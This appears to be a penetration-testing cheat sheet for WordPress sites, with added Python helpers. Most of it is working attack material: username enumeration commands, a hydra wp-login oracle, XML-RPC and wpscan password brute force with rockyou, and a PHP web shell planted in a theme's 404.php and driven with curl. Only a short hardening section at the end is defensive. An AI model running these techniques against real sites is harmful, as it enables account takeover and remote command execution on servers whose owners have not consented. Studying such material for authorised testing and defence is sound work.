# method

## Username enum

**METHOD 1**

```
# With pretty permalinks enabled, ?author=N answers with a redirect whose Location
# header is /author/<username>/ (the user's nicename, normally the login name)
curl -s -I "http://$domain/?author=1"
# Increment the author id to walk the user table; ids with no Location header are
# absent (or hidden by a plugin). Without pretty permalinks the author page is served
# directly and the name shows up in the body/CSS classes instead of the header.
```

```
# Automation: pull the author names that block themes print on post listings
curl -s "$ip" | grep 'class="wp-block-post-author-name' | awk -F '__link">' '{print $2}' | awk -F '</a>' '{print $1}'
```

**METHOD 2 (JQ)**

```
# Anonymous callers only see users who have published posts; "slug" is the nicename, usually the login
curl -s http://"$domain"/wp-json/wp/v2/users | jq
# Without pretty permalinks the route sits behind index.php; per_page/page walk past the default 10 users
curl -s "http://$domain/index.php/wp-json/wp/v2/users/?per_page=100&page=1" | jq
```

**METHOD 3 (hydra)**

```
# F= is the error wp-login.php returns for a username that does not exist, so every name hydra
# reports as a hit is a real account (those answer "The password you entered for the username
# <user> is incorrect"). Check the exact wording on the target first; it changes between versions.
# The H= cookie matters: with testcookie=1 but no wordpress_test_cookie, wp-login.php answers
# "Cookies are blocked" for every attempt, F= never matches, and every name looks valid.
hydra -L /usr/share/seclists/Usernames/cirt-default-usernames.txt -p admin@123 "http-post-form://$domain/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:H=Cookie\: wordpress_test_cookie=WP+Cookie+check:F=not registered on this site"
```
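The three methods above scripted in Python, as an added example that is not part of the original notes: it extracts the username from the `?author=N` redirect, from block-theme author links and from the REST users JSON, and classifies the wp-login.php error text that the hydra `F=` string keys on. The host `blog.example` and every `SAMPLE_*` response are constructed here, not captured from a target; `walk_author_ids()` is the only part that touches the network and is not exercised by the offline samples.

```python
"""Offline helpers for the three username-enumeration methods above (added example).

Standard library only. All sample responses are constructed to match the shapes
WordPress produces; none were captured from a real host.
"""
import json
import re
import urllib.error
import urllib.request

AUTHOR_RE = re.compile(r"/author/([^/?#]+)/?")
# Anchor rendered by the wp-block-post-author-name block in block themes
BLOCK_AUTHOR_RE = re.compile(
    r'class="wp-block-post-author-name__link[^"]*"[^>]*>([^<]+)</a>', re.I)


def username_from_author_redirect(location):
    """Method 1: ?author=N redirects to /author/<username>/ when pretty permalinks are on."""
    m = AUTHOR_RE.search(location or "")
    return m.group(1) if m else None


def authors_from_html(html):
    """Method 1 (automation): author names block themes print in post listings."""
    return sorted(set(name.strip() for name in BLOCK_AUTHOR_RE.findall(html)))


def users_from_rest(body):
    """Method 2: /wp-json/wp/v2/users; slug is user_nicename, which normally equals the login."""
    return [(u["id"], u["slug"], u.get("name", "")) for u in json.loads(body)]


def login_response_kind(html):
    """Method 3: the signal hydra's F= string keys on. 'unknown' = no such user, 'valid' = user exists."""
    if "is not registered on this site" in html:
        return "unknown"
    if "The password you entered for the username" in html:
        return "valid"
    if "Cookies are blocked" in html:
        return "cookie-check"   # testcookie=1 was sent without the wordpress_test_cookie cookie
    return "other"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so the Location header can be read from the HTTPError."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def walk_author_ids(base_url, max_id=10, timeout=5):
    """Live version of Method 1 (network; not run by the offline samples). Returns {id: username}."""
    opener = urllib.request.build_opener(_NoRedirect)
    found = {}
    for n in range(1, max_id + 1):
        req = urllib.request.Request(f"{base_url.rstrip('/')}/?author={n}", method="HEAD")
        try:
            opener.open(req, timeout=timeout)
        except urllib.error.HTTPError as e:          # 301/302 lands here because we refused to follow
            name = username_from_author_redirect(e.headers.get("Location"))
            if name:
                found[n] = name
        except urllib.error.URLError:
            break                                     # host unreachable, stop walking
    return found


# Constructed samples standing in for target responses (blog.example is a made-up host)
SAMPLE_LOCATION = "http://blog.example/author/j.doe/"
SAMPLE_HTML = ('<a href="http://blog.example/author/admin/" '
               'class="wp-block-post-author-name__link">admin</a>'
               '<a href="/author/editor/" class="wp-block-post-author-name__link">editor</a>')
SAMPLE_REST = '[{"id":1,"name":"Site Admin","slug":"admin"},{"id":3,"name":"J Doe","slug":"j.doe"}]'
SAMPLE_LOGIN_UNKNOWN = ('<div id="login_error"><strong>Error:</strong> The username <strong>bob</strong> '
                        'is not registered on this site. If you are unsure of your username, try your '
                        'email address instead.</div>')
SAMPLE_LOGIN_VALID = ('<div id="login_error"><strong>Error:</strong> The password you entered for the '
                      'username <strong>admin</strong> is incorrect. Lost your password?</div>')

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                             # python3 wp_enum.py http://target
        print(walk_author_ids(sys.argv[1]))
    else:
        print(username_from_author_redirect(SAMPLE_LOCATION))
        print(authors_from_html(SAMPLE_HTML))
        print(users_from_rest(SAMPLE_REST))
        print(login_response_kind(SAMPLE_LOGIN_UNKNOWN), login_response_kind(SAMPLE_LOGIN_VALID))
```

The REST slug and the redirect name are both the nicename, so a site that changed a user's nicename gives you a name that is not the login; the wp-login.php oracle is the only one of the three that confirms a login name directly.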

***

## Login brute-force XMLRPC

**Manual**

```
curl -s -X POST --data '<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>' http://"$domain"/xmlrpc.php
# Wrong credentials: HTTP 200 with faultCode 403 "Incorrect username or password." in the XML body
# Valid credentials: an array of blogs (isAdmin, url, blogid, blogName, xmlrpc)
```

**Automated (wpscan)**

```
# --password-attack also accepts wp-login and xmlrpc-multicall; -t is the thread count
wpscan --password-attack xmlrpc -t 20 -U john,david -P /usr/share/wordlists/rockyou.txt --url http://"$domain"/
```

**Enumeration (aggressive)**

```
# -e: all plugins, vulnerable themes, timthumbs, config backups, DB exports, users 1-10, media 1-50
# --api-token pulls vulnerability data from the WPScan API for the versions it finds
wpscan --api-token **** --url "$ip" -e ap,vt,tt,cb,dbe,u1-10,m1-50 --plugins-detection aggressive --plugins-version-detection aggressive --detection-mode aggressive
```

## Is XMLRPC enabled?

> CTF: HTB: Pressed | 0xdf hacks stuff

**Get list of methods**

```
# Methods worth noting in the list: wp.getUsersBlogs (login oracle), system.multicall (batching), pingback.ping
curl -s --data '<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>' http://"$domain"/xmlrpc.php
```

**Use methods**

```
# Without the username/password params this returns a fault, which still proves the endpoint is live;
# the login section above shows the call with parameters
curl -s --data '<methodCall><methodName>wp.getUsersBlogs</methodName><params></params></methodCall>' http://"$domain"/xmlrpc.php
```

**Interact with XMLRPC using python**

```
# Module name is wordpress_xmlrpc; Client(url, username, password) wraps the wp.* methods (needs valid creds)
pip3 install python-wordpress-xmlrpc
```
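Building and reading the XML-RPC traffic behind the manual probe, the listMethods check and the wpscan `xmlrpc`/`xmlrpc-multicall` attacks, as an added example that is not from the page or from python-wordpress-xmlrpc; it uses only the standard library's `xmlrpc.client`. The `SAMPLE_*` response bodies are constructed to match the shape WordPress returns (blog.example is a made-up host), so everything below runs offline.

```python
"""Build and parse WordPress XML-RPC login traffic offline (added example, not from the page).

Standard library only, so python-wordpress-xmlrpc is not needed. The response bodies
below are constructed to match what xmlrpc.php returns; they are not real captures.
"""
import xmlrpc.client


def list_methods_body():
    """Request body for system.listMethods, the same XML the curl above posts."""
    return xmlrpc.client.dumps((), methodname="system.listMethods")


def login_probe_body(username, password):
    """One wp.getUsersBlogs call: the login oracle used for brute force."""
    return xmlrpc.client.dumps((username, password), methodname="wp.getUsersBlogs")


def multicall_body(username, passwords):
    """One wp.getUsersBlogs per password inside system.multicall (what xmlrpc-multicall sends)."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [username, p]} for p in passwords]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def classify(body):
    """Single-call response -> {'status': 'ok', 'result': ...} or {'status': 'fault', 'code': N, 'message': s}."""
    try:
        (result,), _ = xmlrpc.client.loads(body)
    except xmlrpc.client.Fault as f:          # bad creds come back as faultCode 403 inside an HTTP 200
        return {"status": "fault", "code": f.faultCode, "message": f.faultString}
    return {"status": "ok", "result": result}


def classify_multicall(body, passwords):
    """Multicall response -> [(password, 'ok'|'fault', blogs|faultCode), ...], one per password tried."""
    top = classify(body)
    if top["status"] != "ok":                 # whole request refused (XML-RPC off, WAF, malformed)
        return [(p, "fault", top["code"]) for p in passwords]
    out = []
    for p, item in zip(passwords, top["result"]):
        if isinstance(item, dict):            # per-call fault is a struct {faultCode, faultString}
            out.append((p, "fault", item["faultCode"]))
        else:                                 # per-call success is wrapped in a one-element array
            out.append((p, "ok", item[0]))
    return out


def methods_of_interest(body):
    """From a system.listMethods response, keep the methods the techniques on this page rely on."""
    wanted = {"wp.getUsersBlogs", "system.multicall", "pingback.ping"}
    top = classify(body)
    return sorted(wanted.intersection(top["result"])) if top["status"] == "ok" else []


# Constructed sample responses in the shape WordPress emits
SAMPLE_FAULT = (
    '<?xml version="1.0" encoding="UTF-8"?><methodResponse><fault><value><struct>'
    "<member><name>faultCode</name><value><int>403</int></value></member>"
    "<member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>"
    "</struct></value></fault></methodResponse>"
)
BLOG = (
    "<struct><member><name>isAdmin</name><value><boolean>1</boolean></value></member>"
    "<member><name>url</name><value><string>http://blog.example/</string></value></member>"
    "<member><name>blogid</name><value><string>1</string></value></member>"
    "<member><name>blogName</name><value><string>Blog</string></value></member>"
    "<member><name>xmlrpc</name><value><string>http://blog.example/xmlrpc.php</string></value></member></struct>"
)
SAMPLE_OK = ('<?xml version="1.0" encoding="UTF-8"?><methodResponse><params><param><value><array><data>'
             f"<value>{BLOG}</value></data></array></value></param></params></methodResponse>")
SAMPLE_MULTICALL = (
    '<?xml version="1.0" encoding="UTF-8"?><methodResponse><params><param><value><array><data>'
    f"<value><array><data><value><array><data><value>{BLOG}</value></data></array></value></data></array></value>"
    "<value><struct><member><name>faultCode</name><value><int>403</int></value></member>"
    "<member><name>faultString</name><value><string>Incorrect username or password.</string></value></member></struct></value>"
    "</data></array></value></param></params></methodResponse>"
)
SAMPLE_METHODS = ('<?xml version="1.0"?><methodResponse><params><param><value><array><data>'
                  "<value><string>system.multicall</string></value><value><string>system.listMethods</string></value>"
                  "<value><string>wp.getUsersBlogs</string></value><value><string>pingback.ping</string></value>"
                  "</data></array></value></param></params></methodResponse>")

if __name__ == "__main__":
    print(login_probe_body("admin", "CORRECT-PASSWORD"))
    print(classify(SAMPLE_FAULT))
    print(classify_multicall(SAMPLE_MULTICALL, ["right", "wrong"]))
    print(methods_of_interest(SAMPLE_METHODS))
```

The wrong-password signal is faultCode 403 inside an HTTP 200, so the check has to be on the XML, not the status line. Since WordPress 4.4 the server stops authenticating after the first failed login inside one multicall and returns 403 for every later entry, so a correct password placed after a wrong one in the batch still reads as a fault; confirm any multicall hit with a single `login_probe_body()` call.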

## Remote code execution (requires admin credentials)

**Payload**

```
<?php system($_GET['cmd']); ?>
```

**Exploit**

With an administrator session, open Appearance > Theme File Editor, select the active theme's 404.php and paste the payload at the top of the file. The editor is missing when the site sets `DISALLOW_FILE_EDIT` in wp-config.php.

**Run commands**

```
# The theme directory name comes from the page source (wp-content/themes/<theme>/) or from wpscan
curl "http://$domain/wp-content/themes/twentyseventeen/404.php?cmd=id"
curl "http://blog.$domain/wp-content/themes/twentynineteen/404.php?cmd=id"
```

## Leveraging known vulnerabilities

Run waybackurls against the domain and look for wp-content/plugins/<name>/ and wp-content/themes/<name>/ paths in the historic URLs. A plugin that was dropped from the admin side often still sits on disk (deactivated plugins stay reachable by URL), and a stale copy may be an old version with a known vulnerability. Confirm by requesting the plugin directory's readme.txt, which states the version.

### WordPress hardening

**Update WordPress to the latest version**

```
// wp-config.php
define( 'WP_AUTO_UPDATE_CORE', true );

// theme functions.php or a must-use plugin (add_filter() is not loaded yet when wp-config.php runs)
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );
```

Setting `DISALLOW_FILE_EDIT` in wp-config.php removes the theme editor used in the RCE section above, and returning false from the `xmlrpc_enabled` filter turns off xmlrpc.php when nothing needs it.

**WordPress security plugins**

```
Sucuri Security
iThemes Security
Wordfence Security
```
